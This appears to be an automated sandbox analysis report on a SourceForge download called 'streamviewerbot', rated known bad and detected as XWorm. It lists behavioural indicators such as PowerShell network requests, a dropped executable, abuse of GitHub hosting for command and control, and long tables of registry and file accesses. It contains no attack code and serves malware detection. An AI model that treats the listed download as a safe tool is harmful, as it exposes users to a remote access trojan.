Analysis Overview
Threat Level: Known bad
The file https://sourceforge.net/projects/streamviewerbot/files/latest/download was found to be: Known bad.
Malicious Activity Summary
Detect Xworm Payload
Xworm
Command and Scripting Interpreter: PowerShell
Blocklisted process makes network request
Executes dropped EXE
Legitimate hosting services abused for malware hosting/C2
Drops file in System32 directory
Drops file in Windows directory
Enumerates physical storage devices
Uses Task Scheduler COM API
Suspicious use of WriteProcessMemory
Suspicious use of UnmapMainImage
NTFS ADS
Modifies data under HKEY_USERS
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: LoadsDriver
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of SendNotifyMessage
Kills process with taskkill
Enumerates system info in registry
Checks SCSI registry key(s)
Suspicious use of SetWindowsHookEx
Modifies registry class
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of FindShellTrayWindow
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-29 10:32
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-29 10:32
Reported
2024-05-29 10:49
Platform
win11-20240508-en
Max time kernel
981s
Max time network
982s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Xworm
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Desktop\New folder\svb.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | camo.githubusercontent.com | N/A | N/A |
| N/A | camo.githubusercontent.com | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Telemetry.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\ras\SSTPProxy\ProxyConfig.xml | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Inventory.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Steps-Recorder.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Compatibility-Troubleshooter.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-RestartManager%4Operational.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Setup.evtx | C:\Windows\System32\svchost.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Panther\UnattendGC\diagwrn.xml | C:\Windows\System32\oobe\UserOOBEBroker.exe | N/A |
| File created | C:\Windows\INF\netsstpa.PNF | C:\Windows\Explorer.EXE | N/A |
| File created | C:\Windows\INF\netrasa.PNF | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\Tasks\SA.DAT | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\Panther\UnattendGC\setupact.log | C:\Windows\System32\oobe\UserOOBEBroker.exe | N/A |
| File opened for modification | C:\Windows\Panther\UnattendGC\setuperr.log | C:\Windows\System32\oobe\UserOOBEBroker.exe | N/A |
| File opened for modification | C:\Windows\Panther\UnattendGC\diagerr.xml | C:\Windows\System32\oobe\UserOOBEBroker.exe | N/A |
Enumerates physical storage devices
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0064 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0052 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\FriendlyName | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\000A | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Capabilities | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004\ | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0016 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0008 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004D | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0064 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0065 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\000A | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0004 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0051 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A\ | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0008 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0006 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0004 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0058 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\000A | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0004 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Mfg | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0006 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0002 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0052 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0058 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008\ | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\ConfigFlags | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0003 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0003 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\CompatibleIDs | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0038 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0058 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004D | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\DeviceDesc | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A\ | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004E | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0052 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0008 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004D | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0034 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2006 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0016 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2006 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0065 | C:\Windows\system32\svchost.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4290799360" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365268" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292114432" | C:\Windows\system32\LogonUI.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History | C:\Windows\system32\LogonUI.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "24" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133614523960265181" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = 99ebff004cc2ff000091f8000078d4000067c000003e9200001a6800f7630c00 | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292114432" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365268" | C:\Windows\system32\LogonUI.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11 | C:\Users\Admin\Desktop\New folder\svb.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} | C:\Users\Admin\Desktop\New folder\svb.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0" | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" | C:\Users\Admin\Desktop\New folder\svb.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\HAM\AUI\App\V1 | C:\Windows\system32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\WasEverActivated = "1" | C:\Windows\system32\svchost.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202020202020202 | C:\Users\Admin\Desktop\New folder\svb.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "10" | C:\Users\Admin\Desktop\New folder\svb.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\1\NodeSlot = "12" | C:\Users\Admin\Desktop\New folder\svb.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\13\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Users\Admin\Desktop\New folder\svb.exe | N/A |
